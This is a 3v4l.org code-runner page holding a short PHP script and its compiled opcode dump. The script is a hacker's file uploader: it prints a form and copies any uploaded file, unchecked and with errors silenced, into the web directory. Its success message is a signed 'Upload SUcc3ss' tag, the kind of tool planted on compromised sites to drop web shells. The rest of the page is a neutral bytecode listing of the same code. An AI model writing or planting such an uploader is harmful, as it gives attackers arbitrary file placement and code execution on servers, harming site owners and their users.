3v4l.org

run code in 300+ PHP versions simultaneously
<?php echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUcc3ss by Um3r Butt !!!</b><br><br>'; } else { echo '<b>Upload GAGAL !!!</b><br><br>'; } } ?>
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 43) Position 1 = 6, Position 2 = 22
Branch analysis from position: 6
2 jumps found. (Code = 43) Position 1 = 19, Position 2 = 21
Branch analysis from position: 19
1 jumps found. (Code = 42) Position 1 = 22
Branch analysis from position: 22
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 21
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 22
filename:       /in/XpnLF
function name:  (null)
number of ops:  23
compiled vars:  none
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    2     0  E >   ECHO                                                     '%3Cform+action%3D%22%22+method%3D%22post%22+enctype%3D%22multipart%2Fform-data%22+name%3D%22uploader%22+id%3D%22uploader%22%3E'
    3     1        ECHO                                                     '%3Cinput+type%3D%22file%22+name%3D%22file%22+size%3D%2250%22%3E%3Cinput+name%3D%22_upl%22+type%3D%22submit%22+id%3D%22_upl%22+value%3D%22Upload%22%3E%3C%2Fform%3E'
    4     2        FETCH_R                      global              ~0      '_POST'
          3        FETCH_DIM_R                                      ~1      ~0, '_upl'
          4        IS_EQUAL                                                 ~1, 'Upload'
          5      > JMPZ                                                     ~2, ->22
    5     6    >   BEGIN_SILENCE                                    ~3      
          7        INIT_FCALL                                               'copy'
          8        FETCH_R                      global              ~4      '_FILES'
          9        FETCH_DIM_R                                      ~5      ~4, 'file'
         10        FETCH_DIM_R                                      ~6      ~5, 'tmp_name'
         11        SEND_VAL                                                 ~6
         12        FETCH_R                      global              ~7      '_FILES'
         13        FETCH_DIM_R                                      ~8      ~7, 'file'
         14        FETCH_DIM_R                                      ~9      ~8, 'name'
         15        SEND_VAL                                                 ~9
         16        DO_ICALL                                         $10     
         17        END_SILENCE                                              ~3
         18      > JMPZ                                                     $10, ->21
         19    >   ECHO                                                     '%3Cb%3EUpload+SUcc3ss+by+Um3r+Butt+%21%21%21%3C%2Fb%3E%3Cbr%3E%3Cbr%3E'
         20      > JMP                                                      ->22
    6    21    >   ECHO                                                     '%3Cb%3EUpload+GAGAL+%21%21%21%3C%2Fb%3E%3Cbr%3E%3Cbr%3E'
    8    22    > > RETURN                                                   1

Generated using Vulcan Logic Dumper, using php 8.0.0


preferences:
153.16 ms | 1395 KiB | 15 Q